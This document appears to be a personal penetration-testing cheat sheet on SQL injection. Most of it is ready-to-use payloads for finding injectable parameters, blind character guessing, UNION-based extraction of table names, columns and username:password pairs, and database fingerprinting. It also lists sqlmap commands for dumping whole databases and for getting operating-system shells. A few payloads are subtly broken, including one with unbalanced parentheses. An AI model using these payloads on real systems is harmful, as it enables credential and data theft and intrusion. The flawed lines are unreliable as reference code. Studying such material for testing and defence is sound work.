# SQL Injection * [MySQL Comments](https://blog.raw.pm/en/sql-injection-mysql-comment/) ## Finding an Opportunity * GET parameter ```sh http://example.com/index.php?id=' or 1=1 -- - ``` * Sometimes an ID or may come first ```sh http://example.com/index.php?id=10 or 1=1 -- + http://example.com/index.php?id=10' or '1'='1'-- - http://example.com/index.php?id=-1' or 1=1 -- -&password=x ``` * Provoke error to gain information ```sh http://example.com/index.php?id=' ``` * **Incase of client side sanitization craft the URL instead of using the form!!!** ## Usage * Example, terminate string via `'` and resolve via tautology, comment the rest of the string via `--` ```sql SELECT * FROM users WHERE username = admin AND password := ' and 1=1 -- - SELECT * FROM users WHERE username = admin AND password := ' or 1=1 --+ ``` ### Boolean True and False ```sql SELECT * FROM users WHERE username = admin AND password :=1' or 1 < 2 --+ SELECT * FROM users WHERE username = admin AND password :=1' or 1 > 2 --+ ``` ### Blind injection // Guessing characters ```sh http://example.com/?id=1' and substr((select database()),1,1) < 105 --+ ``` ```sh http://example.com/?id=1' and (ascii(substr((select database(),1,1)) = 115 --+ ``` * Function substr(string, start, length) * sqlmap via `--level=5 --risk=3 --dbms=sqlite --technique=b --dump` ### Union based * _First method__ check by order until error occurs ```sql ' order by 1 -- - ' order by 2 -- - ' order by 3 -- - ``` * __Second method__ fuzzing NULL values, followed by fuzzing data types * Check number of cols ```sql ' UNION SELECT NULL-- ' UNION SELECT NULL,NULL-- ' UNION SELECT NULL,NULL,NULL-- # until the error occurs ``` * Check which one is a string ```sql ' UNION SELECT 'a',NULL,NULL,NULL-- ' UNION SELECT NULL,'a',NULL,NULL-- ' UNION SELECT NULL,NULL,'a',NULL-- ' UNION SELECT NULL,NULL,NULL,'a'-- ``` * Retrieve content, for cols and comment two times as an example. Or dump database ```sql ' UNION SELECT NULL,NULL,database(),NULL,NULL from users -- // ' UNION SELECT NULL,username,password,NULL FROM users -- // ``` * [OWASP SQLi Docs](https://www.owasp.org/index.php/SQL_Injection) ### Identify Database ```sh id=sqlite_version() id=@@version # mysql/mssql id=(SELECT banner FROM v$version) # oracle ``` #### SQL Functions * Use sql functions to fumble the tables & cols via union * [source](https://medium.com/@nyomanpradipta120/sql-injection-union-attack-9c10de1a5635) * Extract tables ```sql 1' and 1=2 union select 1,group_concat(table_name),3,4 from information_schema.tables where table_schema = database() -- - ``` * sqlite specific ```sql ' UNION SELECT sql, sql FROM sqlite_master -- - ``` ```sql (SELECT sql FROM sqlite_master WHERE type!='meta' AND sql NOT NULL AND name ='usertable') (SELECT group_concat(tbl_name) FROM sqlite_master WHERE type='table' and tbl_name NOT like 'sqlite_%') ``` * Extract cols ```sh 1' and 1=2 union select 1,group_concat(column_name),3,4 from information_schema.columns where table_schema = database() and table_name ='user'-- - ``` * Data from cols ```sql 1' and 1=2 union select 1,group_concat(username,0x3a,password),3,4 from user-- - ``` ## Tools ### SQLmap * [sqlmap](https://github.com/sqlmapproject/sqlmap.git) * [CheatSheet](https://www.netsparker.com/blog/web-security/sql-injection-cheat-sheet/) * [Examples](https://www.security-sleuth.com/sleuth-blog/2017/1/3/sqlmap-cheat-sheet) * Use `-r` with a saved HTTP request ```sh sqlmap -r request.txt --dbms=mysql --dump sqlmap -r request.txt --batch ``` * Select form data automatically ```sh sqlmap -u http:///site.php --forms --dump-all ``` |Parameter|Details| |-r|Uses the intercepted request save as a file| |--dbms|DBMS of target| |--dump|Dump the entire database| |--dump-all|Dump everything| |-p |TESTPARAMETER| |--os-shell|Prompt for an interactive operating system shell| |--os-pwn|Prompt for an OOB shell, Meterpreter or VNC| ### Damn Small SQLi Scanner (DSSS) * [Script](https://github.com/stamparm/DSSS.git) ```sh python dsss.py -u "http://example.com/index.php?id=" ``` ### Online sqlmap * [Link](https://suip.biz/?act=sqlmap) ## Payloads * [List](https://github.com/payloadbox/sql-injection-payload-list#generic-sql-injection-payloads)